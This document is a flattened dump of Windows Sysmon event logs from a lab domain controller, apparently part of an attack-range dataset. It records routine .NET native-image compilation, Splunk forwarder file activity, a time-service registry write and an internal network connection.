21:04:10.603{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CA-60D3-9B03-00000000CF01}6416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:10.509{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CA-60D3-9A03-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.494{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1CA-60D3-9A03-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:10.494{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CA-60D3-9A03-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:10.400{4DB9351A-A1C9-60D3-9903-00000000CF01}1420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\58c-0\Microsoft.PowerShell.Core.Activities.dll2021-06-23 21:04:10.400 23542300x800000000000000020597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:10.103{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B954473A399CFB4839A69BD200B3DE5A,SHA256=60329765E284E67653D5C637146BD54B2847AE1ECD1D69EDD0BDA39FB05344A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.103{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C2BB34D7E0E0202F0E0C7ED2193F1BB,SHA256=5FCC7A1B7A62D5AE447382893700B3863688719420B255FBB93125E08F0C2758,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.587{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44B24A7743EB9EFAE2B2F78656D4F4B0,SHA256=559001F925D1790EF6BB1F4AE9A85EE9D5FF4AF3CCABDC41A7AC57DCF07A5F84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.228{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EBA6FED47CD5F96A9C23A409C91676F,SHA256=FD0C3684010D955034681F0F750D316A53C4DAC010A3ED6C765DEF9D585AB920,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000020611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.165{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CB-60D3-9D03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.150{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1CB-60D3-9D03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:11.150{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CB-60D3-9D03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000020615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.298{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61423-false10.0.1.12-8000- 23542300x800000000000000020614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:12.275{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=656443E02DF4F60953E7C8E52C38A6B2,SHA256=886B30EF5F08BC64394E5248574219119320A8A3C0E38AFF792463C90275DA67,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000020617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:04:13.947{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d76873-0x52260f3d) 23542300x800000000000000020616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:13.431{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E9AF748C6337000238925FDF0CDA71,SHA256=849A3498ED81A642086DF31FF0B92E19358129DA64CDCF7112EA8838F5C36BBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:14.853{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CE-60D3-9E03-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:14.837{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1CE-60D3-9E03-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:14.837{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CE-60D3-9E03-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:14.618{4DB9351A-A1CB-60D3-9D03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18e4-0\Microsoft.PowerShell.Editor.dll2021-06-23 21:04:14.618 23542300x800000000000000020618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:14.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6956B88020A83BC67BF53A4FFF6E9F7,SHA256=8771140858BFA54A46F72879958B5A85E1467EC1AAFC60102A0848FAD1499F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:15.853{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE1448E79DD02AAFB8D7B85EDDD48EED,SHA256=BA7891394FCB3502D3F1472449D58B709C508A317C4FA02C13376CD0BDA10917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:15.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0404B871836C603B5B884269E48F4FC7,SHA256=1F18F3B377F911650D3BF0F33D1ED7E04BDD39CE1A67D15F157500B077B65416,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:15.118{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CF-60D3-9F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:15.103{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1CF-60D3-9F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:15.103{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CF-60D3-9F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:16.775{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D0-60D3-A103-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:16.759{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1D0-60D3-A103-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:16.759{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D0-60D3-A103-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:16.572{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D0-60D3-A003-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:16.556{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D0-60D3-A003-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
